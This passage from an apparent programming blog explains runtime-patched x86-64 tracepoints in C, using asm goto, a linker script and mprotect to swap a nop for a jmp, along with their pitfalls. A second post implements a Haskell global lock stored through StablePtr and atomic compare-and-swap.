<p>In the common case, the tracepoint is disabled, and the overhead is only a single <a href="http://en.wikipedia.org/wiki/NOP"><code>nop</code></a> instruction. To enable the tracepoint, we replace the <code>nop</code> instruction in memory with <code>jmp do_tracepoint</code>.</p>
<h1 id="the-trace-macro">The <code>TRACE</code> macro</h1>
<p>Our <code>nop</code> instruction needs to be big enough that we can overwrite it with an unconditional jump. On x86-64, the standard <code>jmp</code> instruction has a 1-byte opcode and a 4-byte signed relative displacement, so we need a 5-byte <code>nop</code>. Five one-byte <code>0x90</code> instructions would work, but a single five-byte instruction will consume fewer CPU resources. Finding the best way to do nothing is actually rather difficult, but the Linux kernel has already compiled a list of <a href="http://lxr.linux.no/linux+v3.1/arch/x86/include/asm/nops.h">favorite nops</a>. We'll use this one:</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define NOP5 </span><span class="ot">".byte 0x0f, 0x1f, 0x44, 0x00, 0x00;"</span></code></pre>
<p>Let's check this instruction using <a href="http://udis86.sourceforge.net/"><code>udcli</code></a>:</p>
<pre><code><span class="Prompt">$</span> <span class="Entry">echo 0f 1f 44 00 00 | udcli -x -64 -att</span>
0000000000000000 0f1f440000 nop 0x0(%rax,%rax)
</code></pre>
<p>GCC's <a href="http://gcc.gnu.org/onlinedocs/gcc/Extended-Asm.html#Extended-Asm">extended inline assembly</a> lets us insert arbitrarily bizarre assembly code into a normal C program. We'll use the <a href="http://gcc.gnu.org/onlinedocs/gcc/Extended-Asm.html#Extended-asm-with-goto"><code>asm goto</code></a> flavor, new in GCC 4.5, so that we can pass C labels into our assembly code. (The tracing use case inspired the <code>asm goto</code> feature, and my macro is adapted from an example in the GCC manual.)</p>
<p>Here's how it looks:</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="kw">typedef</span> <span class="dt">int</span> tracepoint;<br /><br /><span class="ot">#define TRACE(_point, _args...) \
do { \
asm goto ( \
"0: " NOP5 \
".pushsection trace_table, \"a\";" \
".quad " #_point ", 0b, %l0;" \
".popsection" \
: : : : __lbl_##_point); \
if (0) { \
__lbl_##_point: printf(_args); \
} \
} while (0)</span></code></pre>
<p>We use the <a href="http://gcc.gnu.org/onlinedocs/cpp/Stringification.html">stringify</a> and <a href="http://gcc.gnu.org/onlinedocs/cpp/Concatenation.html">concat</a> macro operators, and rely on the gluing together of adjacent string literals. A call like this:</p>
<pre class="sourceCode"><code class="sourceCode c">TRACE(foo_entry, <span class="st">"called foo(%d)</span><span class="ch">\n</span><span class="st">"</span>, n);</code></pre>
<p>will produce the following code:</p>
<pre class="sourceCode"><code class="sourceCode c"> <span class="kw">do</span> {<br /> <span class="kw">asm</span> <span class="kw">goto</span> (<br /> <span class="st">"0: .byte 0x0f, 0x1f, 0x44, 0x00, 0x00;"</span><br /> <span class="st">".pushsection trace_table, </span><span class="ch">\"</span><span class="st">a</span><span class="ch">\"</span><span class="st">;"</span><br /> <span class="st">".quad foo_entry, 0b, %l0;"</span><br /> <span class="st">".popsection"</span><br /> : : : : __lbl_foo_entry);<br /> <span class="kw">if</span> (<span class="dv">0</span>) {<br /> __lbl_foo_entry: printf(<span class="st">"called foo(%d)</span><span class="ch">\n</span><span class="st">"</span>, n);<br /> }<br /> } <span class="kw">while</span> (<span class="dv">0</span>);</code></pre>
<p>Besides emitting the <code>nop</code> instruction, we write three 64-bit values ("<code>quad</code>s"). They are, in order:</p>
<ul class="incremental">
<li>The address of the <code>tracepoint</code> variable declared by the user. We never actually read or write this variable. We're just using its address as a unique key.</li>
<li>The address of the <code>nop</code> instruction, by way of a <a href="http://sourceware.org/binutils/docs-2.21/as/Symbol-Names.html#index-local-labels-217">local assembler label</a>.</li>
<li>The address of the C label for our <code>printf</code> call, as passed to <code>asm goto</code>.</li>
</ul>
<p>This is the information we need in order to patch in a <code>jmp</code> at runtime. The <a href="http://sourceware.org/binutils/docs-2.21/as/PushSection.html"><code>.pushsection</code></a> directive makes the assembler write into the <code>trace_table</code> <a href="http://sourceware.org/binutils/docs-2.21/as/Secs-Background.html">section</a> without disrupting the normal flow of code and data. The <code>"a"</code> <a href="http://sourceware.org/binutils/docs/as/Section.html#index-Section-Stack-443">section flag</a> marks these bytes as "allocatable", i.e. something we actually want available at runtime.</p>
<p>We count on GCC's optimizer to notice that the condition <code>0</code> can never be true, and therefore move the <code>if</code> body out of the function's hot path. The body is still considered reachable, due to the label passed to <code>asm goto</code>, so it will not fall victim to dead code elimination.</p>
<h1 id="the-linker-script">The linker script</h1>
<p>We have to collect all of these <code>trace_table</code> records, possibly from multiple source files, and put them somewhere for use by our C code. We'll do this with the following <a href="http://sourceware.org/binutils/docs/ld/Scripts.html#Scripts">linker script</a>:</p>
<pre><code>SECTIONS {
trace_table : {
trace_table_start = .;
*(trace_table)
trace_table_end = .;
}
}
</code></pre>
<p>This concatenates all <code>trace_table</code> sections into a single section in the resulting binary. It also provides symbols <code>trace_table_start</code> and <code>trace_table_end</code> at the endpoints of this section.</p>
<h1 id="memory-protection">Memory protection</h1>
<p>Linux systems will prevent an application from overwriting its own code, for <a href="http://www.openbsd.org/papers/ven05-deraadt/mgp00009.html">good security reasons</a>, but we can explicitly override these permissions. Memory permissions are managed per <a href="http://en.wikipedia.org/wiki/Page_(computer_memory)">page</a> of memory. There's a <a href="http://www.kernel.org/doc/man-pages/online/pages/man3/sysconf.3.html">correct way</a> to determine the size of a page, but our code is terribly x86-specific anyway, so we'll hardcode the page size of 4096 bytes.</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define PAGE_SIZE 4096</span><br /><span class="ot">#define PAGE_OF(_addr) ( ((uint64_t) (_addr)) & ~(PAGE_SIZE-1) )</span></code></pre>
<p>Then we can unprotect an arbitrary region of memory by calling <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/mprotect.2.html"><code>mprotect</code></a> for the appropriate page(s):</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="dt">static</span> <span class="dt">void</span> unprotect(<span class="dt">void</span> *addr, size_t len) {<br /> <span class="dt">uint64_t</span> pg1 = PAGE_OF(addr),<br /> pg2 = PAGE_OF(addr + len - <span class="dv">1</span>);<br /> <span class="kw">if</span> (mprotect((<span class="dt">void</span> *) pg1, pg2 - pg1 + PAGE_SIZE,<br /> PROT_READ | PROT_EXEC | PROT_WRITE)) {<br /> perror(<span class="st">"mprotect"</span>);<br /> abort();<br /> }<br />}</code></pre>
<p>We're calling <code>mprotect</code> on a page which was not obtained from <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/mmap.2.html"><code>mmap</code></a>. POSIX does not define this behavior, but Linux specifically allows <code>mprotect</code> on any page except the <a href="http://transnum.blogspot.com/2009/01/linuxs-vsyscall.html">vsyscall page</a>.</p>
<h1 id="enabling-a-tracepoint">Enabling a tracepoint</h1>
<p>Now we need to implement the <code>enable</code> function:</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="dt">void</span> enable(tracepoint *point);</code></pre>
<p>We will scan through the <code>trace_table</code> records looking for a matching <code>tracepoint</code> pointer. The C struct corresponding to a <code>trace_table</code> record is:</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="kw">struct</span> trace_desc {<br /> tracepoint *point;<br /> <span class="dt">void</span> *jump_from;<br /> <span class="dt">void</span> *jump_to;<br />} __attribute__((packed));</code></pre>
<p>The <code>packed</code> attribute tells GCC not to insert any padding within or after these structs. This ensures that their layout will match the records we produced from assembly. Now we can implement a linear search through this table.</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="dt">void</span> enable(tracepoint *point) {<br /> <span class="kw">extern</span> <span class="kw">struct</span> trace_desc trace_table_start[], trace_table_end[];<br /> <span class="kw">struct</span> trace_desc *desc;<br /> <span class="kw">for</span> (desc = trace_table_start; desc < trace_table_end; desc++) {<br /> <span class="kw">if</span> (desc->point != point)<br /> <span class="kw">continue</span>;<br /><br /> <span class="dt">int64_t</span> offset = (desc->jump_to - desc->jump_from) - <span class="dv">5</span>;<br /> <span class="kw">if</span> ((offset > INT32_MAX) || (offset < INT32_MIN)) {<br /> fprintf(stderr, <span class="st">"offset too big: %lx</span><span class="ch">\n</span><span class="st">"</span>, offset);<br /> abort();<br /> }<br /><br /> <span class="dt">int32_t</span> offset32 = offset;<br /> <span class="dt">unsigned</span> <span class="dt">char</span> *dest = desc->jump_from;<br /> unprotect(dest, <span class="dv">5</span>);<br /> dest[<span class="dv">0</span>] = <span class="bn">0xe9</span>;<br /> memcpy(dest<span class="dv">+1</span>, &offset32, <span class="dv">4</span>);<br /> }<br />}</code></pre>
<p>We enable a tracepoint by overwriting its <code>nop</code> with an unconditional jump. The opcode is <code>0xe9</code>. The operand is a 32-bit displacement, interpreted relative to the instruction <em>after</em> the jump. Since <code>desc->jump_from</code> points to the beginning of what will be the 5-byte jump instruction, we subtract 5 when computing the displacement. Then we unprotect memory and write the new bytes into place.</p>
<p>That's everything. You can grab all of this code from <a href="https://github.com/kmcallister/tracepoints">GitHub</a>, including a simple test program.</p>
<h1 id="pitfalls">Pitfalls</h1>
<p>Where to start?</p>
<p>This code is extremely non-portable, relying on details of x86-64, Linux, and specific recent versions of the GNU C compiler and assembler. The idea can be ported to other platforms, with some care. For example, ARM processors require an <a href="http://lxr.linux.no/linux+v3.1/arch/arm/include/asm/cacheflush.h#L176">instruction cache flush</a> after writing to code. Linux on ARM <a href="http://lxr.linux.no/linux+v3.1/arch/arm/kernel/traps.c#L502">implements</a> the <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/cacheflush.2.html"><code>cacheflush</code> system call</a> for this purpose.</p>
<p>Our code is not thread-safe, either. If one thread reaches a <code>nop</code> while it is being overwritten by another thread, the result will surely be a crash or other horrible bug. The <a href="http://www.ksplice.com/doc/ksplice.pdf">Ksplice paper</a> [PDF] discusses how to prevent this, in the context of <a href="http://www.ksplice.com/">live-patching the Linux kernel</a>.</p>
<p>Is it worth opening this can of worms in order to improve performance a little? In general, no. Obviously we'd have to measure the performance difference to be sure. But for most projects, concerns of maintainability and avoiding bugs will preclude tricky hacks like this one.</p>
<p>The Linux kernel is under extreme demands for both performance and flexibility. It's part of every application on a huge number of systems, so any small performance improvement has a large aggregate effect. And those systems are incredibly diverse, making it likely that <em>someone</em> will see a large difference. Finally, kernel development will always involve tricky low-level code as a matter of course. The infrastructure is already there to support it — both software infrastructure and knowledgeable developers.</p>
<h1 id="global-locking-through-stableptr">Global locking through StablePtr</h1>
<p>Posted by keegan, 2011-11-04.</p>
<p>I spoke before of using <a href="http://mainisusuallyafunction.blogspot.com/2011/10/safe-top-level-mutable-variables-for.html">global locks in Haskell</a> to protect a thread-unsafe C library. And I wrote about a <a href="http://mainisusuallyafunction.blogspot.com/2011/10/thunks-and-lazy-blackholes-introduction.html">GHC bug</a> which breaks the most straightforward way to get a global lock.</p>
<p>My new solution is to store an <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/base-4.3.1.0/Control-Concurrent-MVar.html"><code>MVar</code></a> lock in a C global variable via <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/haskell2010-1.0.0.0/Foreign-StablePtr.html"><code>StablePtr</code></a>. I've implemented this, and it seems to work. I'd appreciate if people could bang on this code and report any issues.</p>
<p>You can get the library from <a href="http://hackage.haskell.org/package/global-lock">Hackage</a> or browse <a href="https://github.com/kmcallister/global-lock">the source</a>, including a <a href="https://github.com/kmcallister/global-lock/blob/master/test/counter.hs">test program</a>. You can also use this code as a template for including a similar lock in your own Haskell project.</p>
<h1 id="the-c-code">The C code</h1>
<p>On <a href="https://github.com/kmcallister/global-lock/blob/master/cbits/global.c">the C side</a>, we declare a global variable and a function to read that variable.</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="dt">static</span> <span class="dt">void</span>* global = <span class="dv">0</span>;<br /><br /><span class="dt">void</span>* hs_globalzmlock_get_global(<span class="dt">void</span>) {<br /> <span class="kw">return</span> global;<br />}</code></pre>
<p>To avoid name clashes, I gave this function a long name based on the <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Compiler/SymbolNames">z-encoding</a> of my package's name. The variable named <code>global</code> will not conflict with another compilation unit, because it's declared <code>static</code>.</p>
<p>Another C function will set this variable, if it was previously 0. Two threads might execute this code concurrently, so we use a GCC <a href="http://gcc.gnu.org/onlinedocs/gcc/Atomic-Builtins.html">built-in for atomic memory access</a>.</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="dt">int</span> hs_globalzmlock_set_global(<span class="dt">void</span>* new_global) {<br /> <span class="dt">void</span>* old = __sync_val_compare_and_swap(&global, <span class="dv">0</span>, new_global);<br /> <span class="kw">return</span> (old == <span class="dv">0</span>);<br />}</code></pre>
<p>If <code>old</code> is not 0, then someone has already set <code>global</code>, and our assignment was dropped. We report this condition to the caller.</p>
<h1 id="foreign-imports">Foreign imports</h1>
<p>On <a href="https://github.com/kmcallister/global-lock/blob/master/System/GlobalLock/Internal.hs">the Haskell side</a>, we import these C functions.</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">foreign import ccall unsafe</span> <span class="st">"hs_globalzmlock_get_global"</span><br /><span class="ot"> c_get_global </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">Ptr</span> ())<br /><br /><span class="kw">foreign import ccall</span> <span class="st">"hs_globalzmlock_set_global"</span><br /><span class="ot"> c_set_global </span><span class="ot">::</span> <span class="dt">Ptr</span> () <span class="ot">-></span> <span class="dt">IO</span> <span class="dt">CInt</span></code></pre>
<p>The <code>unsafe</code> import of <code>c_get_global</code> demands justification. This wrinkle arises from the fact that GHC runs many Haskell threads on the same OS thread. A long-running foreign call from that OS thread might <a href="http://blog.ezyang.com/2010/07/safety-first-ffi-and-threading/">block unrelated Haskell code</a>. GHC prevents this by moving the foreign call and/or other Haskell threads to a different OS thread. This adds latency to the foreign call — about 100 nanoseconds in my tests.</p>
<p>In most cases a 100 ns overhead is negligible. But it matters for functions which are guaranteed to return in a very short amount of time. And blocking other Haskell threads during such a short call is fine. Marking the import <code>unsafe</code> tells GHC to ignore the blocking concern, and generate a direct C function call.</p>
<p>Our function <code>c_get_global</code> is a good use case for <code>unsafe</code>, because it simply returns a global variable. In my <a href="https://github.com/kmcallister/global-lock/blob/master/test/bench.hs">tests</a>, adding <code>unsafe</code> decreased the overall latency of locking by about 50%. We cannot use <code>unsafe</code> with <code>c_set_global</code> because, in the worst case, GCC implements atomic operations with blocking library functions. That's okay because <code>c_set_global</code> will only be called a few times anyway.</p>
<h1 id="the-haskell-code">The Haskell code</h1>
<p>Now we have access to a C global of type <code>void*</code>, and we want to store a Haskell value of type <code>MVar ()</code>. The <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/haskell2010-1.0.0.0/Foreign-StablePtr.html"><code>StablePtr</code></a> module is just what we need. A <code>StablePtr</code> is a reference to some Haskell expression, which can be converted to <code>Ptr ()</code>, aka <code>void*</code>. There is no guarantee about this <code>Ptr ()</code> value, except that it can be converted back to the original <code>StablePtr</code>.</p>
<p>Here's how we store an <code>MVar</code>:</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">set </span><span class="ot">::</span> <span class="dt">IO</span> ()<br />set <span class="fu">=</span> <span class="kw">do</span><br /> mv <span class="ot"><-</span> newMVar ()<br /> ptr <span class="ot"><-</span> newStablePtr mv<br /> ret <span class="ot"><-</span> c_set_global (castStablePtrToPtr ptr)<br /> when (ret <span class="fu">==</span> <span class="dv">0</span>) <span class="fu">$</span><br /> freeStablePtr ptr</code></pre>
<p>It's fine for two threads to enter <code>set</code> concurrently. In one thread, the assignment will be dropped, and <code>c_set_global</code> will return 0. In that case we free the unused <code>StablePtr</code>, and the <code>MVar</code> will eventually be garbage-collected. <code>StablePtr</code>s must be freed manually, because the GHC garbage collector can't tell if some C code has stashed away the corresponding <code>void*</code>.</p>
<p>Now we can retrieve the <code>MVar</code>, or create it if necessary.</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">get </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">MVar</span> ())<br />get <span class="fu">=</span> <span class="kw">do</span><br /> p <span class="ot"><-</span> c_get_global<br /> <span class="kw">if</span> p <span class="fu">==</span> nullPtr<br /> <span class="kw">then</span> set <span class="fu">>></span> get<br /> <span class="kw">else</span> deRefStablePtr (castPtrToStablePtr p)</code></pre>
<p>In the common path, we do an unsynchronized read on the global variable. Only if the variable appears to contain <code>NULL</code> do we allocate an <code>MVar</code>, perform a synchronized compare-and-swap, etc. This keeps overhead low, and makes this library suitable for fine-grained locking.</p>
<p>All that's left is the user-visible locking interface:</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">lock </span><span class="ot">::</span> <span class="dt">IO</span> a <span class="ot">-></span> <span class="dt">IO</span> a<br />lock act <span class="fu">=</span> get <span class="fu">>>=</span> <span class="fu">flip</span> withMVar (<span class="fu">const</span> act)</code>
</pre>
<h1 id="inspecting-the-machine-code">Inspecting the machine code</h1>
<p>Just for fun, let's see how GCC implements <code>__sync_val_compare_and_swap</code> on the AMD64 architecture.</p>
<pre><code><span class="Prompt">$</span> <span class="Entry">objdump -d dist/build/cbits/global.o</span>
...
0000000000000010 <hs_globalzmlock_set_global>:
10: 31 c0 xor %eax,%eax
12: f0 48 0f b1 3d 00 00 lock cmpxchg %rdi,0x0(%rip)
19: 00 00
....
</code></pre>
<p>This <code>lock cmpxchg</code> is the same instruction used by the <a href="http://hackage.haskell.org/trac/ghc/browser/includes/stg/SMP.h?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L165">GHC runtime system</a> for its own atomic compare-and-swap. The offset on the operand <code>0x0(%rip)</code> will be <a href="http://www.iecc.com/linker/linker07.html">relocated</a> to point at <code>global</code>.</p>